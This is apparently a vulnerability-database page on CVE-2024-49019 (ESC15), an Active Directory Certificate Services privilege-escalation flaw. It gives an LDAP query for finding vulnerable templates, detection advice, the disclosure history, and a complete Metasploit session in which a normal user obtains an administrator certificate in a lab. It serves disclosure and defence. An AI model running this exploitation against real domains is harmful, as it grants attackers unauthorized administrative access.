Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
1

CVE-2024-49019

Disclosure Date: November 12, 2024
CVE-2024-49019 CVSS v3 Base Score: 7.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Active Directory Certificate Services Elevation of Privilege Vulnerability

Add Assessment

1
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Easy to weaponizeGives privileged accessAuthenticated
Technical Analysis

This vulnerability is also known as ESC15 and EKUwu.

Overview

Microsoft’s Active Directory Certificate Services (AD CS) is affected by a vulnerability whereby certificate templates using schema version 1 allow the requester to specify the application policies in the form of OIDs to be included in the signed certificate. When combined with the ability to specify the the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) an attacker can request authentication certificates for any user using the built-in, default, User template. While the built-in, default WebServer template is technically vulnerable to this flaw, the default privileges restrict enrollment to the privileged Domain Admins and Enterprise Admins group. An attacker would need to identify a published certificate template that they have the necessary permission to enroll with that uses schema version 1. This is relatively easy to identify by using the following LDAP query and then inspecting the enrollment permissions.

(&
    (objectclass=pkicertificatetemplate)
    (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))
    (|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))
    (pkiextendedkeyusage=*)
    (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)
    (mspki-template-schema-version=1)
)

IOCs

When certificates are issued, a record is kept on the CA. An administrator can view issued certificates using certsrv.msc, navigating to the CA then selecting “Issued Certificates”. Look for the Certificate template that is vulnerable and inspect instances in which it was issued as these could indicate a malicious users has leveraged this flaw.

Disclosure

The vulnerability was first hinted at on the X (formerly Twitter) social media platform by the members of the TrustedSec team who discovered it. Through private conversations, the details began to slowly leak to a larger audience. The details became public on October 7th, 2024 when dru1d-foofus opened a pull request containing a functioning PoC to the popular Certipy repository. The next day, TrustedSec released a blog and detailed writeup regarding the vulnerability. At this time it was unclear whether or not Microsoft would issue a CVE for the vulnerability. Most ESC flaws have not had CVEs issued to identify them. On November 12th, 2024 Microsoft released a patch for this flaw which they issued as CVE-2024-49019.

Exploitation

This vulnerability is exploitable with Metasploit version 6.4.32 using the icpr_cert module and the ADD_CERT_APP_POLICY datastore option.

msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
SMBDomain => COLLALABS1
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
CA => collalabs1-SRV-ADDS01-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
CERT_TEMPLATE => ESC15-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
ADD_CERT_APP_POLICY => 1.3.6.1.4.1.311.20.2.1
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 172.30.239.85
[*] 172.30.239.85:445 - Requesting a certificate...
[+] 172.30.239.85:445 - The requested certificate was issued.
[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
[*] 172.30.239.85:445 - Certificate Policies:
[*] 172.30.239.85:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >
Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Windows Server 2019 10.0.17763.6532
Windows Server 2019 (Server Core installation) 10.0.17763.6532
Windows Server 2022 10.0.20348.2849
Windows Server 2022, 23H2 Edition (Server Core installation) 10.0.25398.1251
Windows Server 2016 10.0.14393.7515
Windows Server 2016 (Server Core installation) 10.0.14393.7515
Windows Server 2008 Service Pack 2 6.0.6003.22966
Windows Server 2008 Service Pack 2 (Server Core installation) 6.0.6003.22966
Windows Server 2008 Service Pack 2 6.0.6003.22966
Windows Server 2008 R2 Service Pack 1 6.1.7601.27415
Windows Server 2008 R2 Service Pack 1 (Server Core installation) 6.1.7601.27415
Windows Server 2012 6.2.9200.25165
Windows Server 2012 (Server Core installation) 6.2.9200.25165
Windows Server 2012 R2 6.3.9600.22267
Windows Server 2012 R2 (Server Core installation) 6.3.9600.22267
Windows Server 2025 10.0.26100.2314
Windows Server 2025 (Server Core installation) 10.0.26100.2314
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • microsoft

Products

  • windows server 2008 -,
  • windows server 2008 r2,
  • windows server 2012 -,
  • windows server 2012 r2,
  • windows server 2016,
  • windows server 2019,
  • windows server 2022,
  • windows server 2022 23h2,
  • windows server 2025

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis